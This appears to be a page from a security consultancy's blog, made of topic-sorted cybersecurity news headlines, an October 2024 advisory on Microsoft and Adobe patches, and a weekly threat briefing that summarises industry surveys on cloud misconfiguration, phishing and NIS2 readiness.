Social Media Accounts: The Weak Link in Organisational SaaS Security (thehackernews.com)
The Social Media Moral Panic Is All About Confusing Risks & Harms | Techdirt
Training, Education and Awareness
Cyber security Is Serious — but It Doesn't Have to Be Boring (darkreading.com)
Regulations, Fines and Legislation
From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)
Marriott settles for $52M after years-long breaches • The Register
Cyber Security and Resilience Bill Update (techuk.org)
UK’s cyber incident reporting law to move forward in 2025 | Computer Weekly
Influential resource on international cyber law updated for 2024 (techxplore.com)
New EU law touts strict cyber security requirements for all connected and IoT devices | Cybernews
How to secure your business before new Cyber Security and Resilience Bill (businesscloud.co.uk)
NIS2 & DORA: Staying ahead of the curve | TechRadar
Risk managers call for EU cyber consistency (emergingrisks.co.uk)
EU retaliates against Russian ‘hybrid warfare’ with new regulations (brusselssignal.eu)
FCC Fines T-Mobile $31.5 Million After Carrier Was Hacked 8 Times In 5 Years | Techdirt
Balancing legal frameworks and enterprise security governance - Help Net Security
Risk Strategies Drawn From the EU AI Act (darkreading.com)
Medical Group Pays $240K Fine for 3 Ransomware Attacks (govinfosecurity.com)
Models, Frameworks and Standards
Meet the shared responsibility model with new CIS resources - Help Net Security
From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)
NIS2 & DORA: Staying ahead of the curve | TechRadar
NIS2 & DORA: Staying ahead of the curve | TechRadar
DORA regulation's nuts and bolts - Help Net Security
Data Protection
Careers, Working in Cyber and Information Security
US CISO Compensation on the Rise, Report Finds | MSSP Alert
Banishing Burnout: Data Security Hangs in Balance in Cyber Wellbeing Crisis - IT Security Guru
CISO Paychecks: Worth the Growing Security Headaches? (darkreading.com)
Widening talent pool in cyber with on-demand contractors - Help Net Security
Imposter syndrome in cyber security | Pen Test Partners
Cyber security careers - BBC News
Career Spotlight: The Growing Demand for OT Security Experts (databreachtoday.co.uk)
6 Simple Steps to Eliminate SOC Analyst Burnout (thehackernews.com)
UK Cyber Team seeks future security professionals | Computer Weekly
Law Enforcement Action and Take Downs
British man arrested over hack-to-trade scheme using email password resets | ITPro
Ukrainian pleads guilty to operating Raccoon Stealer malware (bleepingcomputer.com)
Dutch cops reveal takedown of 'largest dark web market' • The Register
Homeland Security Blocked 500+ Ransomware Attacks Since 2021 (pymnts.com)
UK to Continue Disruptive Actions Targeting Cyber Crime (databreachtoday.co.uk)
Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)
FBI created a crypto token so it could watch it being abused • The Register
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar
Nation State Actors
China
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
The 30-year-old internet backdoor law that came back to bite | TechCrunch
Massive US security breach highlights danger of weakening encryption | Proton
Chinese cyber spies reportedly breached Verizon, AT&T • The Register
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
OpenAI says it has disrupted 20-plus foreign influence networks in past year | CyberScoop
OpenAI says Chinese gang tried to phish its staff • The Register
Russia
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
DOJ seizes 41 Russian-controlled domains in cyber-espionage crackdown | CSO Online
European govt air-gapped systems breached using custom malware (bleepingcomputer.com)
NCSC issues fresh alert over wave of Cozy Bear activity | Computer Weekly
Microsoft: ‘relentless’ Russia-sponsored hacking group has been disrupted - Security - CRN Australia
Russia and Iran want ‘sustained mayhem’ in UK, MI5 warns
Major breach exposes every Dutch police officer: state-sponsored actor suspected | Cybernews
EU retaliates against Russian ‘hybrid warfare’ with new regulations (brusselssignal.eu)
US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (bleepingcomputer.com)
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
Google officially kicks Kaspersky antivirus software app off the Play Store | TechRadar
Pro-Russian cyber attacks hit Belgium for fourth consecutive day (belganewsagency.eu)
Kaspersky says it's closing down its UK office and laying off dozens | TechCrunch
Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday (thehackernews.com)
Cyber Attack Group 'Awaken Likho' Targets Russian Government with Advanced Tools (thehackernews.com)
Iran
MI5 Chief Warns of Cyber Threats to the UK - InfoRiskToday
Russia and Iran want ‘sustained mayhem’ in UK, MI5 warns
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
Earth Simnavaz Levies Advanced Cyber Attacks Against UAE and Gulf Regions | Trend Micro (US)
North Korea
North Korean Hackers Attacking US Organisations With Unique Hacking Tools (cybersecuritynews.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar
Leaked documents reveal British military’s secret assistance to Israeli army | Al Bawaba
What is spyware? And how do you protect yourself from it? | TechRadar
Tools and Controls
MSSP Market News: Survey Shows 62% of SOC Alerts are Ignored | MSSP Alert
How to protect data centres as Critical National Infrastructure (networkingplus.co.uk)
Cyber insurance demand to rise as new threats emerge, says Bloomberg Intelligence - Reinsurance News
45% of cyber security leaders are stressed about budget restraints | Security Magazine
Organisations are taking action towards cyber resilience: PwC - Reinsurance News
How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online
Hackers Exploiting DNS Tunneling Service To Bypass Network Firewalls (cybersecuritynews.com)
Strengthening Cyber Security with NDR and EDR integration - SiliconANGLE
Setting Up Your Network Security? Avoid These 4 Mistakes (techrepublic.com)
Cyber security professionals are turning to AI as more lose control of detection tools | ZDNET
SOC teams are frustrated with their security tools - Help Net Security
Why Web Application Firewalls Are an Indispensable Part of the Security Stack (thefastmode.com)
Cyber security leaders still shaky about post-attack recovery, reports show | Healthcare IT News
How to Get Going with CTEM When You Don't Know Where to Start (thehackernews.com)
Cyber Security Is Serious — but It Doesn't Have to Be Boring (darkreading.com)
Other News
Study: 92% of Healthcare Firms Hit by Cyber Attacks This Year (inforisktoday.com)
Five percent of all Adobe Commerce and Magento stores hacked, researchers say | Cybernews
NCSC celebrates eight years as Horne blows in | Computer Weekly
Cyber security in an age of terror
Almost half of UK higher education institutions experience a cyber attack every week | TechRadar
London Fire Brigade block almost 340,000 cyber attacks (verdict.co.uk)
Healthcare's Grim Cyber Prognosis Requires Security Booster (darkreading.com)
Kaspersky says it's closing down its UK office and laying off dozens | TechCrunch
Building Cyber Resilience in SMBs With Limited Resources (darkreading.com)
Middle East, Turkey See Cyber Threats Rise (darkreading.com)
Modern payment systems: An effective way to reduce your attack surface | ITPro
Illegal donations: how does dark money get into UK politics? | TBIJ (thebureauinvestigates.com)
Cyber security tips for barristers, solicitors and legal... - NCSC.GOV.UK
Government launches cyber standard for local authorities | Computer Weekly
Reasons why MSPs are the future | Microscope (computerweekly.com)
Vulnerability Management
Vulnerabilities
Microsoft: Windows 11 22H2 Home and Pro reached end of servicing (bleepingcomputer.com)
CISA says critical Fortinet RCE flaw now exploited in attacks (bleepingcomputer.com)
Hackers Exploiting Veeam RCE Vulnerability to Deploy Ransomware (cybersecuritynews.com)
Five percent of all Adobe Commerce and Magento stores hacked, researchers say | Cybernews
UK telcos including BT at risk from DrayTek router vulnerabilities | Computer Weekly
Critical Apache Avro SDK RCE flaw impacts Java applications (securityaffairs.com)
PoC Exploit Released for Microsoft Office 0-day Flaw - CVE-2024-38200 (cybersecuritynews.com)
Single HTTP Request Can Exploit 6M WordPress Sites (darkreading.com)
Okta Classic customers told to check logs for sign-on bypass | SC Media (scworld.com)
Adobe Releases Security Updates for Multiple Products | CISA
Three new Ivanti CSA zero-day actively exploited in attacks (securityaffairs.com)
US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (bleepingcomputer.com)
VMware NSX Vulnerabilities Allow Hackers To Execute Arbitrary Commands (cybersecuritynews.com)
Researchers discover 14 new DrayTek vulnerabilities | Security Magazine
WordPress LiteSpeed Cache plugin flaw could allow site takeover (securityaffairs.com)
Still running Windows 11 22H2? No more security fixes from Microsoft for you! (betanews.com)
Exploit code for critical GitLab auth bypass flaw released (CVE-2024-45409) - Help Net Security
Firefox Zero-Day Under Attack: Update Your Browser Immediately (thehackernews.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 09 October 2024 – Microsoft and Adobe Security Updates
Black Arrow Cyber Advisory 09 October 2024 – Microsoft Patch Tuesday and Adobe Security Updates
Executive summary
Microsoft’s October Patch Tuesday provides updates to address 117 security issues across its product range, including two actively exploited vulnerabilities and three publicly disclosed bugs. In addition to the Microsoft updates this week also saw Adobe fix 52 vulnerabilities across various products.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisations data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of Windows, and all affected Adobe products as soon as possible. The updates should be applied as soon as possible for the actively exploited vulnerability and all other vulnerabilities that have a critical severity rating.
Microsoft
Further details on other specific updates within this Microsoft patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct
Adobe
Further details of the vulnerabilities in Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Briefing 04 October 2024
Black Arrow Cyber Threat Intelligence Briefing 04 October 2024:
-How Snoozing on Cyber Security Fails Modern Businesses
-Cyber Criminals Capitalise on Poorly Configured Cloud Environments
-90% of Cyber Security Incidents Could Be Avoided, Survey Reveals
-The Cyber Industry Needs to Accept It Can't Eliminate Risk
-Cyber Teams Say They Can’t Keep Up with Attack Volumes
-C-Level Executives are a Weak Point for Cyber Security
-Email Phishing Attacks Surge as Attackers Bypass Security Controls
-Security Threats Are More Pressing Than Ever for Business Leaders, With Cloud Worries Taking Top Spot
-Ten Million Brits Hit by Fraud in Just Three Years
-Is the Weakest Link in Cyber Security Becoming Even Weaker?
-Cyber Incidents are the Achilles Heel for Major UK CEOs, Report Finds
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
How Snoozing on Cyber Security Fails Modern Businesses
A recent study has found that many organisations are delaying crucial data security updates, likened to hitting the snooze button on an alarm. This reluctance to modernise security measures leaves businesses vulnerable to evolving threats as technologies like cloud and AI are integrated into operations. The report highlights that clinging to legacy security systems can lead to significant financial and reputational damage. Despite the ever-present threat of cyber attacks, many organisations hesitate to upgrade due to comfort with existing systems and perceived cost implications. The adoption of modern security practices like Zero Trust models and AI-driven tools is essential to mitigate these risks.
Cyber Criminals Capitalise on Poorly Configured Cloud Environments
According to the 2024 Elastic Global Threat Report, cyber criminals are exploiting poorly configured cloud environments and leveraging off-the-shelf offensive security tools, which account for approximately 54% of observed malware alerts, with one tool responsible for over 27% of infections. Misconfigurations are widespread: 47% of Microsoft Azure failures are tied to storage issues, and 30% of AWS failures result from the lack of multi-factor authentication. There has been a 12% increase in brute-force techniques, particularly in Azure environments. While defence technologies are making progress, the report emphasises the need for enterprises to enhance cloud configurations and enforce security measures like multi-factor authentication.
90% of Cyber Security Incidents Could Be Avoided, Survey Reveals
Veeam Software has found that only 43% of EMEA IT decision-makers believe the forthcoming NIS2 directive will significantly enhance EU cyber security. This scepticism persists despite 90% of respondents reporting at least one security incident in the past year that NIS2 could have prevented. While nearly 80% are confident they will eventually comply with NIS2, up to two-thirds expect to miss the October 2024 deadline. The report highlights barriers to compliance, including technical debt (24%), lack of leadership understanding (23%), and insufficient budget (21%). Additionally, 40% have experienced decreased IT budgets since NIS2 was announced, with many organisations ranking it lower in urgency than other business priorities.
The Cyber Industry Needs to Accept It Can't Eliminate Risk
A recent analysis highlights that striving for zero risk in cyber security is unattainable for organisations. The reliance on large technology providers like CrowdStrike exposes systemic risks, where an incident can have widespread impact across dependent businesses. The article emphasises that instead of pursuing perfection, organisations should focus on reducing risks to a manageable level. Transparency with stakeholders about residual risks is crucial to set realistic expectations and maintain trust. It also suggests diversifying technology stacks to avoid overloading risk onto a few providers, and implementing practical security measures that can be consistently followed to manage risks effectively.
Cyber Teams Say They Can’t Keep Up with Attack Volumes
ISACA has found that understaffing and underfunding are major concerns for cyber security professionals in Europe, with 61% reporting understaffed teams and 52% citing underfunding despite predicted spending increases. The report highlighted that 68% feel their work is more stressful now than in 2019 due to a complex threat landscape. Nearly 58% expect to face a cyber attack in the next 12 months, up six percentage points from 2023. Additionally, 52% pointed to a lack of soft skills among cyber pros, especially communication, exacerbating the skills gap in the industry.
C-Level Executives are a Weak Point for Cyber Security
Research indicates that 72% of US senior executives have been targeted by cyber attacks in the past 18 months, highlighting the C-suite as a key security vulnerability. Attacks have grown in frequency and sophistication, with impersonation scams up by 26%, and 27% involving AI-assisted deepfakes. Despite this, many organisations have not prioritised executive security training, though 87% of IT professionals believe senior executives require more training than other staff. As cyber security remains a top concern, companies must enhance security measures to protect their data.
Email Phishing Attacks Surge as Attackers Bypass Security Controls
Egress has reported a 28% rise in email phishing attacks in Q2 2024 compared to Q1, highlighting attackers' effective methods to bypass security controls. These threats intensify as 44% of attacks originated from internally compromised accounts and 8% from supply chain accounts. The report found that 89% of phishing emails involved impersonation, often targeting HR, IT and finance departments. Additionally, commodity attacks have surged, causing a 2700% increase in phishing volumes during such campaigns. Emerging trends also show attackers using multi-channel approaches, leveraging platforms like MS Teams and WhatsApp to exploit vulnerabilities.
Security Threats Are More Pressing Than Ever for Business Leaders, With Cloud Worries Taking Top Spot
PwC has found that cloud-related threats are now the top concern for executives, with 42% ranking them as their primary worry. Despite this focus, 34% admit they are least prepared to address these issues. Hack-and-leak operations and third-party breaches are also significant concerns, cited by 38% and 35% of respondents respectively. Interestingly, Chief Information Security Officers place ransomware among their top three worries, with 42% feeling underprepared to tackle it. The expanding attack surface from increased reliance on cloud, AI, and connected devices underscores the need for an agile, enterprise-wide approach to resilience.
Ten Million Brits Hit by Fraud in Just Three Years
A recent study sponsored by Santander UK and conducted by the Social Market Foundation (SMF) revealed that 21% of respondents across 15 European countries experienced fraud between 2021 and 2023, at a direct cost of £168bn. However, the SMF estimated the total cost of such incidents at £420bn; this includes productivity losses from having to spend time reporting and recovering from the fraud incident. In the UK alone, victims lost an average of £907 each, amounting to a total direct cost of around £9bn. The report highlights that while most believe banks should lead in compensating victims, many also see digital platforms and telecom providers as responsible. Both SMF and Santander are calling on the British government to spearhead a global initiative to combat fraud, including international agreements and enhanced law enforcement.
Is the Weakest Link in Cyber Security Becoming Even Weaker?
Human error is the leading cause of cyber security breaches, with Cybint reporting that 95% result from human mistakes. Verizon's 2023 Data Breach Investigations Report highlights that 74% of incidents involve a human element, such as clicking on phishing links. The rise of deepfakes and increased exposure of personal information have intensified these risks, making attacks more sophisticated. Despite awareness training, prominent organisations continue to face breaches. Notably, Gen Z is over three times more likely to fall for online fraud compared to baby boomers. Remote working has further blurred boundaries, increasing vulnerability to cyber attacks.
Cyber Incidents are the Achilles Heel for Major UK CEOs, Report Finds
FGS Global has found that cyber attacks are the top concern for UK businesses, with 36% of senior leaders reporting cyber incidents in the past year. Despite 85% of firms experiencing a crisis, only 36% feel highly prepared to handle ransomware attacks, which over half fear facing. The report highlights a lack of understanding around cyber security and cyber crime, intensified by AI risks.
Sources:
https://votiro.com/blog/how-snoozing-on-cybersecurity-fails-modern-businesses/
https://www.helpnetsecurity.com/2024/10/04/cloud-environments-attack-surface/
https://dcnnmagazine.com/security/90-of-cybersecurity-incidents-could-be-avoided-survey-reveals/
https://www.computerweekly.com/opinion/The-cyber-industry-needs-to-accept-it-cant-eliminate-risk
https://www.computerweekly.com/news/366612212/Cyber-teams-say-they-cant-keep-up-with-attack-volumes
https://www.techradar.com/pro/c-level-executives-are-a-weak-point-for-cybersecurity-research-says
https://www.infosecurity-magazine.com/news/email-phishing-surge-bypass/
https://www.infosecurity-magazine.com/news/ten-million-brits-hit-fraud-three/
https://hackernoon.com/is-the-weakest-link-in-cybersecurity-becoming-even-weaker
https://www.cityam.com/cyber-incidents-are-the-achilles-heel-for-major-uk-ceos-report-finds/
Governance, Risk and Compliance
CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)
Allies to Leverage During a Cyber Crisis (darkreading.com)
The cyber industry needs to accept it can't eliminate risk | Computer Weekly
Cyber incidents are the Achilles Heel for major UK CEOs, report finds (cityam.com)
As CISO roles expand, so should cyber budgets, says NASCIO 2024 cyber security report | StateScoop
Human Capital and Risk Governance: Insider Threats To Cyber Security (forbes.com)
Global cyber threat to double predicts new report (emergingrisks.co.uk)
Over Half of Cyber Professionals Feel Their Budget is Underfunded - IT Security Guru
C-level executives are a weak point for cyber security | TechRadar
Average North American CISO salary now $565,000 • The Register
BlackBerry report: Cyber threats up 53%, critical sectors hit (securitybrief.co.nz)
Cyber teams say they can’t keep up with attack volumes | Computer Weekly
Watch out, CFOs: cyber crime is booming, says former White House advisor | Fortune
Normalizing Security Culture: Stay Ready (darkreading.com)
Cyber attacks causing reputational damages: CIRA – BNN Bloomberg
Security spending signals major role change for CISOs and their teams | CSO Online
Strengthening Security Posture Through People-First Engagement (informationsecuritybuzz.com)
Forrester's CISO Budget Planning Guide for 2025: Prioritize API Security - Security Boulevard
Gartner: CISOs should ditch ‘zero tolerance’ prevention (techinformed.com)
How to Enlist the CFO as a Cyber Security Budget Ally | Mimecast
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware gangs are using stolen data to threaten CEOs | Fortune
Embargo ransomware escalates attacks to cloud environments (bleepingcomputer.com)
Microsoft: Cloud Environments of US Organisations Targeted in Ransomware Attacks - SecurityWeek
Multinational police effort hits sections of Lockbit ransomware operation | CyberScoop
Russia’s FSB protected Evil Corp gang that carried out NATO cyber-attacks (yahoo.com)
US charges Joker's Stash and Rescator money launderers (bleepingcomputer.com)
More frequent disruption operations needed to dent ransomware gangs, officials say | CyberScoop
Ransomware activity shows no signs of slowing down - Help Net Security
International Counter Ransomware Initiative 2024 Joint Statement | The White House
Ransomware crew infects 100+ orgs monthly with BabyLockerKZ • The Register
Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)
Healthcare organisations are having to pay millions to solve ransomware attacks | TechRadar
Here's what to expect from the Counter Ransomware Initiative meeting this week (therecord.media)
JPCERT shares Windows Event Log tips to detect ransomware attacks (bleepingcomputer.com)
Some of the world's biggest countries are teaming up to tackle ransomware scams | TechRadar
Ransomware August 2024 round-up: fools, rules and tools | TechFinitive
Ransomware Victims
Patelco Credit Union Data Breach Impacts Over 1 Million People - SecurityWeek
Ransomware forces Texas hospital to turn away ambulances • The Register
Agence France-Presse says cyber attack targeted IT systems (therecord.media)
Dermatology Practice Sued After Ransomware Attack Exposed Data (bloomberglaw.com)
Phishing & Email Based Attacks
UK on high alert over Iranian spear-phishing attacks, says NCSC | Computer Weekly
New report reveals a rise in phishing attacks, as commodity (globenewswire.com)
Beyond Phishing: AI's New Tricks for Cyber Attacks (govinfosecurity.com)
UK issues alert over threat from cyber attackers working for Iranian state | Evening Standard
iPhone, Android Users Warned After 50,000 Message Email Bomb Attack (forbes.com)
Common Words in Email Scams: Money, Income, Investment, More | Entrepreneur
QR Code phishing is advancing to a new level, so be on your guard | TechRadar
Attackers Targeting Recruiters With More_Eggs Backdoor (darkreading.com)
“Gone Phishing”—Every Cyber Attacker’s Favorite Phrase - Gigaom
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)
Ireland is the most phished country in the world, says survey (siliconrepublic.com)
Business Email Compromise (BEC)/Email Account Compromise (EAC)
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
Other Social Engineering
QR Code phishing is advancing to a new level, so be on your guard | TechRadar
Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors
INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)
Physical Security Is a Big Part of Staying Digitally Safe: My 5 Top Tips (makeuseof.com)
Meet the people hacker trying to improve cyber security (siliconrepublic.com)
Artificial Intelligence
AI-related cyber crime sparks concern among 65% of global survey participants (techmonitor.ai)
New report reveals a rise in phishing attacks, as commodity (globenewswire.com)
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
Three essential steps for organisations to safeguard against deepfakes | TechRadar
Beyond Phishing: AI's New Tricks for Cyber Attacks (govinfosecurity.com)
Putting an end to the AI cyber responsibility turf wars | CyberScoop
Shadow AI, Data Exposure Plague Workplace Chatbot Use (darkreading.com)
FIN7 Gang Hides Malware in AI “Deepnude” Sites - Infosecurity Magazine (infosecurity-magazine.com)
Ukraine-Russia Cyber Battles Have Real-World Impact (darkreading.com)
Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)
Could APIs be the undoing of AI? - Help Net Security
AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)
1 in 4 people have experienced identity fraud - and most of them blame AI | ZDNET
Rogue AI: What the Security Community is Missing | Trend Micro (US)
Spotting AI-generated scams: Red flags to watch for - Help Net Security
Cyber security experts praise veto of California's AI safety bill | SC Media (scworld.com)
2FA/MFA
The most common authentication method is also the least secure - Help Net Security
Session Hijacking 2.0 — The Latest Way That Attackers are Bypassing MFA (thehackernews.com)
Malware
FIN7 Gang Hides Malware in AI “Deepnude” Sites - Infosecurity Magazine (infosecurity-magazine.com)
New Fin7 Hacker’s AI Naked Image Generator Serves Up More Than Nudes (forbes.com)
DCRat Malware Spreads via HTML Smuggling | MSSP Alert
Attackers Targeting Recruiters With More_Eggs Backdoor (darkreading.com)
Thousands of Linux systems infected by stealthy malware since 2021 (arstechnica.com)
Microsoft reveals how Windows 10 and Windows 11 block keyloggers - Neowin
AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)
Here's How Criminals Use CAPTCHAs to Help Spread Malware (makeuseof.com)
North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks (thehackernews.com)
Bots/Botnets
New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet (thehackernews.com)
What bots mean for businesses and consumers - Help Net Security
Mobile
iPhone, Android Users Warned After 50,000 Message Email Bomb Attack (forbes.com)
This nasty Android adware is making phones unusable — how to stay safe | Tom's Guide (tomsguide.com)
‘Pig butchering’ trading apps found on Google Play, App Store (bleepingcomputer.com)
Verizon outage: iPhones, Android devices stuck in SOS mode (bleepingcomputer.com)
Denial of Service/DoS/DDoS
Record-Breaking DDoS Attack Peaked at 3.8 Tbps, 2.14 Billion Pps - SecurityWeek
After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks - SecurityWeek
Hacktivist activity drives a rise in DDoS attacks (betanews.com)
Telcos face increasing frequency and sophistication of DDoS attacks - Nokia (telecoms.com)
Cloudflare mitigated new record-breaking DDoS attack of 3.8 Tbps (securityaffairs.com)
Wave of record-breaking DDoS attacks originating from compromised WiFi routers | Cybernews
Internet of Things – IoT
Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)
Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors
Data Breaches/Leaks
Transport for London (TfL) cyber attack: What you need to know - BBC News
43% of data breaches target small businesses in 5 industries | Retail Technology Review
UK data watchdog confirms it's investigating MoneyGram data breach | TechCrunch
Patelco Credit Union Data Breach Impacts Over 1 Million People - SecurityWeek
T-Mobile US agrees to $31.5M settlement after IT breaches • The Register
Dutch police breached by a state actor (securityaffairs.com)
Louisiana Accounting Firm Breach Impacts More Than 127K Customers | MSSP Alert
Organised Crime & Criminal Actors
UK man allegedly used genealogy sites to hack execs’ email accounts | Fortune
Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)
How the FBI and Mandiant caught a 'serial hacker' who tried to fake his own death | TechCrunch
UK reveals father and son at heart of Evil Corp hacking group - BBC News
Man charged for selling forged license keys for network switches (bleepingcomputer.com)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Linux malware “perfctl” behind years-long cryptomining campaign (bleepingcomputer.com)
Over $750 Million Stolen in Crypto Last Quarter Despite Drop in Hacks: CertiK - Decrypt
New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet (thehackernews.com)
AI-Powered Rhadamanthys Stealer Targets Crypto Wallets with Image Recognition (thehackernews.com)
Insider Risk and Insider Threats
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
Insider Threats: Are Disgruntled Employees a Cyber Security Risk? | PLANSPONSOR
Insurance
A Guide to Buying and Maintaining Cyberinsurance | PLANSPONSOR
Beazley forecasts cyber insurance market to grow to $40bn by 2030 - Reinsurance News
Munich Re’s HSB launches comprehensive cyber insurance solution for SMBs - Reinsurance News
Supply Chain and Third Parties
Cyber companies need a best practice approach to major incidents. | Computer Weekly
Digital twins are optimizing supply chains and more. Here's why enterprises should care | ZDNET
Cloud/SaaS
Embargo ransomware escalates attacks to cloud environments (bleepingcomputer.com)
Microsoft: Cloud Environments of US Organisations Targeted in Ransomware Attacks - SecurityWeek
Cloud threats top execs' list of cyber nightmares • The Register
Cyber criminals capitalize on poorly configured cloud environments - Help Net Security
The top enterprise cloud threats of 2024 (betanews.com)
Hackers Breach Hybrid Cloud with Stolen Entra ID Credentials (petri.com)
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
Hacker made millions from breaking into business Office 365 accounts | TechRadar
Navigating the Security Risks of Multicloud Management (darkreading.com)
Top 6 Cloud Security Threats to Watch Out For - Security Boulevard
The End of The SaaS Era: Rethinking Software’s Role In Business
Outages
Cyber companies need a best practice approach to major incidents. | Computer Weekly
UK Post Office axes MoneyGram services in wake of cyber attack (finextra.com)
Verizon outage: iPhones, Android devices stuck in SOS mode (bleepingcomputer.com)
The Playstation Network is down in a global outage (bleepingcomputer.com)
Identity and Access Management
Five Eyes Agencies Release Guidance on Detecting Active Directory Intrusions - SecurityWeek
Active Directory attack guidance issued by Five Eyes | SC Media (scworld.com)
Encryption
The fix for BGP’s weaknesses – RPKI – has issues of its own • The Register
Linux and Open Source
Worried about that critical RCE Linux bug? Here's why you can relax | ZDNET
After Code Execution, Researchers Show How CUPS Can Be Abused for DDoS Attacks - SecurityWeek
Thousands of Linux systems infected by stealthy malware since 2021 (arstechnica.com)
Passwords, Credential Stuffing & Brute Force Attacks
The most common authentication method is also the least secure - Help Net Security
Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)
IBM X-Force: Hackers Using Phishing, BEC to Steal Cloud Credentials | MSSP Alert
Passkeys and Cyber Security Awareness: A New Era Of Business Security (informationsecuritybuzz.com)
Poor password habits still an issue worldwide (betanews.com)
Complicated Passwords Make You Less Safe, Experts Now Say (forbes.com)
Why your password policy should include a custom dictionary (bleepingcomputer.com)
Social Media
Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)
Students Add Facial Recognition to Meta Smart Glasses to Identify Strangers in Real-Time - MacRumors
UK regulator preparing for ‘strong action’ against tech giants
Are social media influencers equipped to dodge cyber attacks? | Mint (livemint.com)
Brits bemoan personal data practices but do little about it • The Register
Training, Education and Awareness
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
One-Third of UK Teachers Do Not Have Cyber Security Training (techrepublic.com)
Regulations, Fines and Legislation
NIS2 could prevent cyber security incidents but many businesses aren't ready (betanews.com)
Up to 600 million Facebook and Instagram passwords stored in plain text (9to5mac.com)
SolarWinds CISO: World's Cyber Regulations Still 'In Flux' (pymnts.com)
Sellafield nuclear site in Cumbria fined for IT security breaches - BBC News
Government outlines plan for Cyber Security and Resilience Bill | UKAuthority
How Should CISOs Navigate the SEC Cyber Security Rules? (darkreading.com)
Ireland to grant National Cyber Security Centre emergency powers (finextra.com)
Opinion: How to design a US data privacy law | Ars Technica
UK data watchdog confirms it's investigating MoneyGram data breach | TechCrunch
T-Mobile US agrees to $31.5M settlement after IT breaches • The Register
Opinion | Artificial Intelligence Requires Specific Safety Rules - The New York Times (nytimes.com)
Minimum Healthcare Cyber Standards Called by New Legislation | MSSP Alert
UK regulator preparing for ‘strong action’ against tech giants
Cyber Security in the European Union | Cooley LLP - JDSupra
Financial regulatory agencies are sunsetting a tool to assess cyber risks | FedScoop
Cyber security experts praise veto of California's AI safety bill | SC Media (scworld.com)
Models, Frameworks and Standards
NIS2 could prevent cyber security incidents but many businesses aren't ready (betanews.com)
Could Security Misconfigurations Top OWASP List? (darkreading.com)
